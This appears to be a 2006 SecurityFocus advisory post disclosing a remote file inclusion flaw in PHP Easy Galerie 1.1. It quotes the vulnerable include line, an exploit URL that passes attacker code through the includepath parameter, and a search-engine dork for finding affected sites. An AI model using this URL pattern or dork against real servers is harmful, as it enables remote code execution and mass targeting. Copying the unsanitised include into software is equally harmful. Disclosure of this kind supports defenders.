PHP Easy Galerie Index.PHP Remote File Include Vulnerability May 21 2006 10:45AM
craziest gmail com
Vendor: Power-Place

www.power-place.net

(PHP Easy Galerie 1.1)

-------------------------------------------------

Author:Craziest

Contact: craziest(at)gmail(dot)com

Vuln discovered by BrEakerS

--------------------------------------------------

Method:An attacker can exploit this issue to include

an arbitrary remote file containing malicious PHP code and execute

it in the context of the webserver process by

source:

if(isset($includepath)){

include ("$includepath");

http://[url]/gallerypath/index.php?includepath=evilcode

Search:"Power-Place 2003/2004"

--------------------------------------------------------

Greets:Rootshell Security Group

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus